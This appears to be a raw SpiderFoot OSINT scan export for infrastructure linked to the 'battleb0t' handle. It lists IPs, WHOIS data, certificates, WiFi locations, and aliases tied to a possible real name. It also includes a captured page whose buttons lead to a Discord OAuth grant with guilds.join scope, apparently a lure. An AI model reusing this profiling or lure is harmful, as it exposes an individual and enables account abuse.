ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Altan (Net ID: 00:12:BF:67:61:97) | 40.2024, 29.0398 |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 0 | 0 | 0 | 0 | None | DawixSulej | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.227 | 104.196.30.220 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://funny.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 120.48.229.35.bc.googleusercontent.com | 35.229.48.120 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0065paula.github.io | 185.199.111.153 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.152): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NameCheap, Inc. | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.222 | 104.196.30.220 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.209): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 4 | 0 | 1 | 0 | None | https://kekw.battleb0t.xyz/jar | battleb0t.xyz |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.120 | 34.148.97.127 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Host": ["87.248.157.102:2091"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"]} | 87.248.157.102 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-oo.github.io]
https://www.openphish.com/feed.txt | 0-oo.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Carmen (Net ID: 00:00:28:F1:95:B9) | 41.8781, -87.6298 |
| 2023-05-12 02:45:34 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 34.74.170.74 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:35:51) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, 